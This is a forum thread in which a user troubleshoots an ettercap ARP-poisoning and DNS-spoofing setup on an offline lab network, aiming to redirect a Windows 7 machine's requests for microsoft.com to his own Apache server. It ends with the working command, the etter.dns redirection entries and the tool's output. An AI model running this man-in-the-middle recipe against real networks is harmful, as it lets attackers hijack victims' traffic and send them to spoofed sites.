pierre Posted December 21, 2015 Share Posted December 21, 2015 hello, I try to use the plugin dns_spoof on a victim machine. However, an errors appears ... root@osboxes:~# ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.2.//ettercap 0.8.2 copyright 2001-2015 Ettercap Development TeamTARGET (–i) contains invalid chars ! The parameter " -i " requires an interface value so what's wrong ?? PS : I can do the classic MITM with the graphical interface. Quote Link to comment Share on other sites More sharing options...
digininja Posted December 21, 2015 Share Posted December 21, 2015 Looks like you did a copy paste from a document or website which used a special character rather than a normal - character. Quote Link to comment Share on other sites More sharing options...
pierre Posted December 22, 2015 Author Share Posted December 22, 2015 The command works with ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2// Here is how I've done :I try to redirect a victim to my own apache web server when he is on a particular URL.First I have a look at etter.dns :root@osboxes:~# vim /etc/ettercap/etter.dns # microsoft sucks ;)# redirect it to www.linux.org#microsoft.com A 192.168.0.1*.microsoft.com A 192.168.0.1www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allowedSo the victim be spoof by going on microsoft.comI can ping my victim :root@osboxes:~# ifconfig eth0 192.168.0.1/24root@osboxes:~# ping 192.168.0.2PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.808 ms64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.639 ms^C--- 192.168.0.2 ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1000msrtt min/avg/max/mdev = 0.639/0.723/0.808/0.088 msI active webserver :root@osboxes:~# service apache2 startSo now I enter this command :ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//ettercap 0.8.2 copyright 2001-2015 Ettercap Development TeamListening on: eth0 -> 08:00:27:1D:EC:A2 192.168.0.1/255.255.255.0 fe80::a00:27ff:fe1d:eca2/64SSL dissection needs a valid 'redir_command_on' script in the etter.conf fileEttercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.Privileges dropped to EUID 65534 EGID 65534... 33 plugins 42 protocol dissectors 57 ports monitored20388 mac vendor fingerprint1766 tcp OS fingerprint2182 known servicesLua: no scripts were specified, not starting up!Randomizing 255 hosts for scanning...Scanning the whole netmask for 255 hosts...* |==================================================>| 100.00 %Scanning for merged targets (1 hosts)...* |==================================================>| 100.00 %3 hosts added to the hosts list...ARP poisoning victims: GROUP 1 : 192.168.0.2 08:00:27:3B:98:9D GROUP 2 : ANY (all the hosts in the list)Starting Unified sniffing...Text only Interface activated...Hit 'h' for inline helpActivating dns_spoof plugin...But unfortunately, victim can access to microsoft.com , nothing is spoof...PS : My victim have access to my webserver by hitting @IP in URL of it browser Quote Link to comment Share on other sites More sharing options...
pierre Posted December 22, 2015 Author Share Posted December 22, 2015 *My computer are not connected on Internet. Quote Link to comment Share on other sites More sharing options...
pierre Posted December 23, 2015 Author Share Posted December 23, 2015 So one has any ideas ?? Quote Link to comment Share on other sites More sharing options...
cooper Posted December 23, 2015 Share Posted December 23, 2015 You went from /192.168.0.2.// to //192.168.0.2// I believe the extra slash at the beginning is causing ettercap to misinterpret your intentions. You might want to consider not including the -q (quiet) parameter until things do work. Quote Link to comment Share on other sites More sharing options...
pierre Posted December 24, 2015 Author Share Posted December 24, 2015 it still does not works... Here is my /etc/ettercap/etter.dns configuration : microsoft.com A 192.168.0.1*.microsoft.com A 192.168.0.1www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allowed I've done this : root@osboxes:~# ettercap -T -i eth0 -P dns_spoof -M arp /192.168.0.2.// Thu Dec 24 06:04:37 2015 [797997]UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)............ FHFAEBEECACACACACACACACACACACAAA.. ..Thu Dec 24 06:04:38 2015 [358326]UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)............ FHFAEBEECACACACACACACACACACACAAA.. ..Thu Dec 24 06:04:38 2015 [547962]UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)............ FHFAEBEECACACACACACACACACACACAAA.. ..[same logs..] But my W7 computer (I turned off all firewall) isn't redirected to my own apache server. When I hit 192.168.0.1 in URL, W7 comes to my Apache server... What's wrongggg ? Quote Link to comment Share on other sites More sharing options...
cooper Posted December 24, 2015 Share Posted December 24, 2015 Port 137 is NetBIOS so I don't understand what that has to do with DNS. You're supposed to provide IP addresses, so I'm thinking the dot at the end of the .2 address is wrong, though I believe that if ettercap encounters such a thing and has issues with it, it should complain about it. Anyways, I would start with removing that dot. Look at the traffic on the network with Wireshark. Verify that the ARP packets are sent by your machine to the target to tell it it should use your machine for something rather than whatever it's configured to use. Quote Link to comment Share on other sites More sharing options...
pierre Posted December 29, 2015 Author Share Posted December 29, 2015 Thanks you very much, it now works very !! I've just had to remove the dot :) Thanks you very much ! :) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.